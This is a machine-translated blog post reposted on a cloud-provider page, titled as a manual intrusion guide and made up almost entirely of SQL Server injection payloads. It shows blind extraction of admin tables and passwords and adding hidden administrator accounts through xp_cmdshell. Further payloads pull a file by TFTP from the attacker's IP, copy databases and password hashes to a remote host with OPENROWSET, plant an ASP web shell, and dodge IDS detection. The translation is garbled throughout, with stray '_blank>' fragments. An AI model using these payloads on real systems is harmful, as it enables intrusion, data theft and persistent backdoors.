The correct manual intrusion method

Source: Internet
Author: User
Tags access properties sql server injection

The correct manual intrusion method

1. Determine if there are any injection points

‘ ; and 1=1 and 1=2

2. Guess table: Common table: admin adminuser user pass password etc...

and 0<> (SELECT COUNT (*) from *)

and 0<> (SELECT COUNT (*) from admin)---Determine if the admin table exists

3. Guess the number of accounts if you encounter 0< return to the correct page 1< the error page describes the number of accounts is a

and 0< (SELECT COUNT (*) from admin)

and 1< (SELECT COUNT (*) from admin)

4. Guess the field name in Len () parentheses plus the field name we think of.

and 1= (SELECT COUNT (*) from admin where Len (*) >0)--

and 1= (SELECT COUNT (*) from admin where Len (user field name "name") >0)

and 1= (SELECT COUNT (*) from admin where Len (_blank> password field name password) >0)

5. Guess the length of each field the length of the solution is to transform the >0 until it returns to the correct page.

and 1= (SELECT COUNT (*) from admin where Len (*) >0)

and 1= (SELECT COUNT (*) from admin where Len (name) >6) error

and 1= (SELECT COUNT (*) from admin where Len (name) >5) The correct length is 6

and 1= (SELECT COUNT (*) from admin where Len (name) =6) is correct

and 1= (SELECT COUNT (*) from admin where Len (password) >11) correct

and 1= (SELECT COUNT (*) from admin where Len (password) >12) error length is 12

and 1= (SELECT COUNT (*) from admin where Len (password) =12) correct

6. Guessing characters

and 1= (SELECT COUNT (*) from the admin where left (name,1) =a)---Guess the first bit of the user account

and 1= (SELECT COUNT (*) from the admin where left (name,2) =ab)---Guess the second digit of the user account

Just add one character at a time so guess, guess enough you just guessed how many bits of the right, the account even came out

and 1= (select top 1 count (*) from Admin where ASC (mid (pass,5,1)) =51)--

This query statement can be used to guess the Chinese user and _blank> password. Just change the back number to the Chinese Assic code. Finally, the result is converted into characters.

GROUP BY Users.id have 1=1--

Group by Users.id, Users.username, Users.password, users.privs have 1 =

; Insert into users values (666, Attacker, Foobar, 0xFFFF)--

UNION Select TOP 1 column_blank>_name from Information_blank>_schema. COLUMNS Where table_blank> _name=logintable-

UNION Select TOP 1 column_blank>_name from Information_blank>_schema. COLUMNS where table_blank>_name=logintable where Column_blank>_name not in (login_blank>_id)-

UNION Select TOP 1 column_blank>_name from Information_blank>_schema. COLUMNS where table_blank>_name=logintable where Column_blank>_name not in (login_blank>_id,login_blank>_ Name)-

UNION Select TOP 1 login_blank> _name from logintable-

UNION Select TOP 1 password from logintable where login_blank>_name=rahul--

See _blank> server hit patch = Error hit SP4 patch

and 1= (SELECT @ @VERSION)--

See _blank> database Connection account permissions, return to normal, proved to be the _blank> server role sysadmin permissions.

and 1= (Select is_blank>_srvrolemember (sysadmin))--

Determine the connection _blank> database account number. (The SA account connection returns to Normal = proves that the connection account is SA)

and sa= (Select system_blank>_user)--

and User_blank>_name () =dbo--

and 0<> (select User_blank>_name ()--

See if Xp_blank>_cmdshell Delete

and 1= (Select count (*) from master.dbo.sysobjects Where xtype = X and name = Xp_blank>_cmdshell)--

Xp_blank>_cmdshell is deleted, restored, supports absolute path recovery

; EXEC Master.dbo.sp_blank>_addextendedproc xp_blank>_cmdshell,xplog70.dll--

; EXEC Master.dbo.sp_blank>_addextendedproc xp_blank>_cmdshell,c: \inetpub\wwwroot\xplog70.dll--

Ping your experiment in reverse

; use Master;declare @s int;exec sp_blank>_oacreate "Wscript.Shell", @s out;exec sp_blank>_oamethod @s, "Run", NULL, "Cmd.exe/c ping 192.168.0.1";--

Add account

;D eclare @shell INT exec sp_blank>_oacreate Wscript.Shell, @shell OUTPUT EXEC sp_blank> _oamethod @shell, Run,null, C : \winnt\system32\cmd.exe/c net user jiaoniang$ 1866574/add--

Create a virtual directory e-disk:

;d eclare @o int exec sp_blank>_oacreate Wscript.Shell, @o out exec sp_blank>_oamethod @o, run, NULL, cscript.exe c \ Inetpub\wwwroot\mkwebdir.vbs-w "Default Web Site"-V "E", "E: \"--

Access properties: (Mates write a Webshell)

DECLARE @o int exec sp_blank>_oacreate Wscript.Shell, @o out exec sp_blank>_oamethod @o, run, NULL, Cscript.exe c:\i Netpub\wwwroot\chaccess.vbs-a w3svc/1/root/e +browse

Special _blank> Tips for Exploding libraries:: \=\ or change/and \ Modify%5 submission

and 0< > (select top 1 paths from newtable)--

Get the library name (from 1 to 5 is the system id,6 above can be judged)

and 1= (select name from master.dbo.sysdatabases where dbid=7)--

and 0<> (SELECT COUNT (*) from master.dbo.sysdatabases where name>1 and dbid=6)

Submit dbid = 7,8,9 .... Get more _blank> database names

and 0<> (select top 1 name from bbs.dbo.sysobjects where Xtype=u) burst to a table assumed to be admin

and 0 <> (select top 1 name from Bbs.dbo.sysobjects where Xtype=u and name is not in (Admin)) to get other tables.

and 0<> (SELECT COUNT (*) from bbs.dbo.sysobjects where Xtype=u and Name=admin

and uid> (str (ID))) The value of the burst to UID is assumed to be 18779569 Uid=id

and 0<> (select top 1 name from Bbs.dbo.syscolumns where id=18779569) gets a field of admin, assuming user_blank>_id

and 0<> (select top 1 name from Bbs.dbo.syscolumns where id=18779569 and name not in

(ID,...)) To burst out of other fields.

and 0< (select user_blank>_id from BBS.dbo.admin where username>1) can get the user name

You can get the _blank> password in turn ..... Suppose there are fields such as user_blank>_id username, password, etc.

and 0<> (SELECT COUNT (*) from master.dbo.sysdatabases where name>1 and dbid=6)

and 0<> (select top 1 name from bbs.dbo.sysobjects where xtype=u) get table name

and 0<> (select top 1 name from Bbs.dbo.sysobjects where Xtype=u and name is not in (Address))

and 0<> (SELECT COUNT (*) from bbs.dbo.sysobjects where Xtype=u and Name=admin and uid> (str (ID))) Determine the ID value

and 0<> (select top 1 name from BBS.dbo.syscolumns where id=773577794) all fields

? id=-1 Union Select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin

Id=-1 Union Select 1,2,3,4,5,6,7,8, *,9,10,11,12,13 from admin (union,access)

Get Web Path

; CREATE TABLE [dbo]. [Swap] ([Swappass][char] (255));--

and (select top 1 swappass from swap) =1--

; Create TABLE newtable (id int IDENTITY (max), paths varchar) Declare @test varchar () exec master. Xp_blank>_regread @rootkey =hkey_blank>_local_blank>_machine, @key =system\currentcontrolset \Services\ W3svc\parameters\virtual roots\, @value_blank >_name=/, [email protected] OUTPUT insert into paths (path) VALUES (@test )--

; Use ku1;--

; CREATE table cmd (str image);--Create an image type of form cmd

There is a test process for Xp_blank>_cmdshell:

; EXEC master. Xp_blank>_cmdshell dir

; exec master.dbo.sp_blank>_addlogin jiaoniang$;--plus SQL account

; exec Master.dbo.sp_blank>_password null,jiaoniang$,1866574;--

; exec master.dbo.sp_blank>_addsrvrolemember jiaoniang$ sysadmin;--

; Exec Master.dbo.xp_blank>_cmdshell net user jiaoniang$ 1866574/workstations:*/times:all/passwordchg:yes/ passwordreq:yes/active:yes/add;--

; exec Master.dbo.xp_blank>_cmdshell net localgroup Administrators jiaoniang$/add;--

EXEC master. Xp_blank> _servicecontrol Start, schedule start _blank> service

EXEC master. Xp_blank>_servicecontrol Start, server

; DECLARE @shell INT exec sp_blank>_oacreate Wscript.Shell, @shell OUTPUT EXEC sp_blank>_oamethod @shell, Run,null, C: \winnt\system32\cmd.exe/c NET user jiaoniang$ 1866574/add

;D eclare @shell INT exec sp_blank>_oacreate Wscript.Shell, @shell OUTPUT EXEC sp_blank>_oamethod @shell, Run,null, C:\WINNT\SYSTEM32\CMD.EXE/C net localgroup Administrators jiaoniang$/add

; EXEC master. Xp_blank>_cmdshell tftp-i Youip Get file.exe--use TFTP to upload files

;d eclare @a sysname set @a=xp_blank>_+cmdshell exec @a dir c \

;d eclare @a sysname set @a=xp+_blank>_cm ' + ' Dshell exec @a dir c \

;d eclare @a;set @a=db_blank>_name (); Backup database @a to disk= your IP to your shared directory Bak.dat

If you are restricted, you can.

SELECT * FROM OPENROWSET (_blank>sqloledb,server;sa;,select ok! exec master.dbo.sp_blank>_addlogin Hax)

Query constructs:

Select * FROM news Where id= ... and topic= ... And .....

Adminand 1= (SELECT COUNT (*) from [user] where Username=victim and right (left (userpass,01), 1) =1) and Userpass <>

Select 123;--

; Use master;--

: A or name like fff%;--shows a user named Ffff ha.

and 1<> (select count (email) from [user]);--

; Update [users] set email= (select top 1 name from sysobjects where Xtype=u and status>0) where name=ffff;--

; Update [users] set email= (select top 1 id from sysobjects where xtype=u and Name=ad) where name=ffff;--

; Update [users] set email= (select top 1 name from sysobjects where Xtype=u and id>581577110) where name=ffff;--

; Update [users] set email= (select top 1 count (ID) from password) where name=ffff;--

; Update [users] set email= (select top 1 pwd from password where id=2) where name=ffff;--

; Update [users] set email= (select top 1 name from password where id=2) where name=ffff;--

The above statement is to get the first user table in the _blank> database and place the table name in the FFFF user's mailbox field.

By looking at FFFF's user profile, you get the first table called AD.

Then the ID of this table is given by the table name AD to get the name of the second table

Insert into users values (666, char (0x63) +char (0x68) +char (0x72) +char (0x69) +char (0x73), char (0x63) +char (0x68) +char ( 0x72) +char (0x69) +char (0x73), 0xFFFF)--

Insert into users values (667,123,123,0XFFFF)--

Insert into users values (123, admin--, Password, 0xffff)--

; and user>0

; and (select COUNT (*) from sysobjects) >0

; and (select COUNT (*) from mysysobjects) >0//For access_blank> database

Name of data table cited

; Update AAA set aaa= (select top 1 name from sysobjects where xtype=u and status>0);--

This is the field where the first table name is updated to AAA.

Read the first table, and the second table can be read like this (after the condition Plus and name< > The table name you just got).

; Update AAA set aaa= (select top 1 name from sysobjects where xtype=u and status>0 and Name<>vote);--

Then id=1552 and exists (SELECT * from AAA where aaa>5)

read out the second table and read it out one at a time until there is no.

The Read field is this:

; Update AAA set aaa= (select top 1 col_blank>_name (object_blank>_id (table name), 1));--

Then id=152 and exists (SELECT * from AAA where aaa>5) error, get field name

; Update AAA set aaa= (select top 1 col_blank>_name (object_blank>_id (table name), 2));--

Then id=152 and exists (SELECT * from AAA where aaa>5) error, get field name

[Get data table name] [Update the field value to the table name, then the idea to read out the value of this field to get the table name]

The Update table name set field = (select top 1 name from sysobjects where xtype=u and status>0 [and name<> you get the name of the table to find one plus]) [whe Re condition] Select top 1 name from sysobjects where Xtype=u and status>0 and name not in (Table1,table2,...)

SQL Server Injection _blank> Vulnerability build _blank> database Administrator account and system administrator account [current account must be sysadmin group]

[Get Data table field name] [Update field value to field name, then try to read the value of this field to get the field name]

Update table name Set field = (select top 1 col_blank>_name (object_blank>_id (data table name to query), field column: 1) [Where condition]

Bypassing IDs detection [using variables]

;d eclare @a sysname set @a=xp_blank>_+cmdshell exec @a dir c \

;d eclare @a sysname set @a=xp+_blank>_cm ' + ' Dshell exec @a dir c \

1. Open the remote _blank> database

Basic syntax

SELECT * from OPENROWSET (SQLOLEDB, server=servername;uid=sa;pwd=123, select * FROM table1)

Parameters: (1) OLE DB Provider name

2, where the connection string parameter can be any port used to connect, such as

SELECT * from OPENROWSET (SQLOLEDB, uid=sa;pwd= 123; NETWORK=DBMSSOCN; address=192.168.0.1,1433;, select * FROM table

3. Copy the entire _blank> database of the destination host to insert all remote tables into the local table.

Basic syntax:

Insert into OPENROWSET (SQLOLEDB, server=servername;uid=sa;pwd=123, select * FROM table1) SELECT * FROM Table2

This line copies all the data from the Table2 table on the target host to the Table1 table in the remote _blank> database. In practice, modify the IP address and port of the connection string appropriately, pointing to the desired place, such as:

Insert into OPENROWSET (sqloledb,uid=sa;pwd=123; NETWORK=DBMSSOCN; address= 192.168.0.1,1433;,select * FROM table1) SELECT * FROM Table2

Insert INTO OPENROWSET (sqloledb,uid=sa;pwd= 123; NETWORK=DBMSSOCN; Address=192.168.0.1,1433;,select * from _blank>_sysdatabases)

SELECT * FROM master.dbo.sysdatabases

Insert into OPENROWSET (sqloledb,uid=sa;pwd=123; NETWORK=DBMSSOCN; address= 192.168.0.1,1433;,select * from _blank>_sysobjects)

SELECT * FROM User_blank> _database.dbo.sysobjects

Insert into OPENROWSET (sqloledb,uid=sa;pwd=123; NETWORK=DBMSSOCN; address= 192.168.0.1,1433;,select * from _blank>_syscolumns)

SELECT * FROM User_blank> _database.dbo.syscolumns

Copy the _blank> database:

Insert INTO OPENROWSET (sqloledb,uid=sa;pwd= 123; NETWORK=DBMSSOCN; Address=192.168.0.1,1433;,select * FROM table1) SELECT * from database. Table1

Insert into OPENROWSET (sqloledb,uid=sa;pwd=123; NETWORK=DBMSSOCN; Address=192.168.0.1,1433;,select * FROM table2) SELECT * from database. Table2

The hash of the copy Hassi (hash) login _blank> password is stored in sysxlogins. Here's how:

Insert into OPENROWSET (SQLOLEDB, uid=sa;pwd=123; NETWORK=DBMSSOCN; Address=192.168.0.1,1433;,select * from _blank>_sysxlogins) SELECT * FROM Database.dbo.sysxlogins

After the hash is obtained, brute force can be cracked.

How to traverse a directory: Create a temporary table first: Temp

CREATE table temp (ID nvarchar (255), Num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255));--

Insert Temp exec master.dbo.xp_blank>_availablemedia;--get all current drives

INSERT into temp (ID) EXEC master.dbo.xp_blank>_subdirs c:\;--get a list of subdirectories

Insert into temp (ID,NUM1) EXEC master.dbo.xp_blank>_dirtree c:\;--Get the directory tree structure of all subdirectories and into the temp table

INSERT into temp (ID) EXEC Master.dbo.xp_blank>_cmdshell type c:\web\index.asp;--View the contents of a file

INSERT into temp (ID) exec Master.dbo.xp_blank>_cmdshell dir c:\;--

INSERT into temp (ID) exec Master.dbo.xp_blank>_cmdshell dir c: *.asp/s/a;--

INSERT into temp (ID) exec master.dbo.xp_blank> _cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc

Insert into temp (ID,NUM1) EXEC master.dbo.xp_blank>_dirtree c:\;--(xp_blank>_dirtree applicable public)

Write table:

Statement 1:and 1= (Select is_blank>_srvrolemember (sysadmin));--

Statement 2:and 1= (Select is_blank>_srvrolemember (serveradmin));--

Statement 3:and 1= (Select is_blank>_srvrolemember (setupadmin));--

Statement 4:and 1= (Select is_blank>_srvrolemember (securityadmin));--

Statement 5:and 1= (Select is_blank>_srvrolemember (securityadmin));--

Statement 6:and 1= (Select is_blank>_srvrolemember (diskadmin));--

Statement 7:and 1= (Select is_blank>_srvrolemember (bulkadmin));--

Statement 8:and 1= (Select is_blank>_srvrolemember (bulkadmin));--

Statement 9:and 1= (Select is_blank>_member (Db_blank>_owner));--

Write the path to the table:

CREATE TABLE dirs (paths varchar, id int)--

; Insert dirs exec master.dbo.xp_blank>_dirtree c:\--

and 0<> (select top 1 paths from dirs)--

and 0<> (select top 1 paths from dirs where paths isn't in (@Inetpub))--

CREATE TABLE dirs1 (paths varchar, id int)--

; Insert dirs exec master.dbo.xp_blank>_dirtree e:\web--

and 0<> (select top 1 paths from dirs1)--

Back up the _blank> database to the Web directory: Download

;d eclare @a sysname; Set @a=db_blank>_name (); Backup Database @a to disk=e:\web\down.bak;--

and 1= (select top 1 name from (select top id,name from sysobjects where Xtype=char ()) T ORDER BY id DESC)

and 1= (Select Top 1 col_blank>_name (object_blank>_id (User_blank>_login), 1) from sysobjects see related tables.

and 1= (select user_blank>_id from User_blank>_login)

and 0= (select User from User_blank>_login where user>1)

-=-Wscript.Shell Example-=-

DECLARE @o int

exec sp_blank>_oacreate Wscript.Shell, @o out

EXEC Sp_blank>_oamethod @o, run, NULL, notepad.exe

; DECLARE @o int exec sp_blank>_oacreate Wscript.Shell, @o out exec sp_blank>_oamethod @o, run, NULL, notepad.exe--

declare @o int, @f int, @t int, @ret int

DECLARE @line varchar (8000)

exec sp_blank>_oacreate Scripting.FileSystemObject, @o out

exec Sp_blank>_oamethod @o, OpenTextFile, @f out, C:\Boot.ini, 1

exec @ret = Sp_blank>_oamethod @f, ReadLine, @line out

while (@ret = 0)

Begin

Print @line

exec @ret = Sp_blank>_oamethod @f, ReadLine, @line out

End

declare @o int, @f int, @t int, @ret int

exec sp_blank>_oacreate Scripting.FileSystemObject, @o out

exec Sp_blank>_oamethod @o, CreateTextFile, @f out, c:\inetpub\wwwroot\foo.asp, 1

exec @ret = Sp_blank>_oamethod @f, WriteLine, NULL,

<% Set o = Server.CreateObject ("Wscript.Shell"): O.run (Request.QueryString ("cmd"))%>

declare @o int, @ret int

exec sp_blank>_oacreate Speech.voicetext, @o out

EXEC sp_blank> _oamethod @o, register, NULL, Foo, bar

EXEC sp_blank>_oasetproperty @o, speed, 150

exec Sp_blank>_oamethod @o, speak, NULL, all your sequel servers is belong To,us, 528

WAITFOR DELAY 00:00:05

; declare @o int, @ret int exec sp_blank>_oacreate Speech.voicetext, @o out exec sp_blank>_oamethod @o, register, NULL , foo, bar exec sp_blank>_oasetproperty @o, speed, Sp_blank>_oamethod exec @o, speak, NULL, all your sequel Serv ERs is belong to us, 528 waitfor delay 00:00:05--

Xp_blank>_dirtree Applicable Permissions Public

EXEC master.dbo.xp_blank>_dirtree c \

The returned information has two fields subdirectory, depth. The subdirectory field is a character type, and the depth field is an integer field.

CREATE TABLE dirs (paths varchar (), id int)

Build the table, the table here is related to the above xp_blank>_dirtree, the field is equal, the same type.

Insert dirs exec master.dbo.xp_blank>_dirtree c \

As long as we build the table and the fields returned by the store process are defined equal to be able to execute! Achieve the effect of writing a table, step by step to achieve the information we want


This article is from "My World, I am the director." "Blog, be sure to keep this provenance http://biock.blog.51cto.com/4643304/1643920

The correct manual intrusion method

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.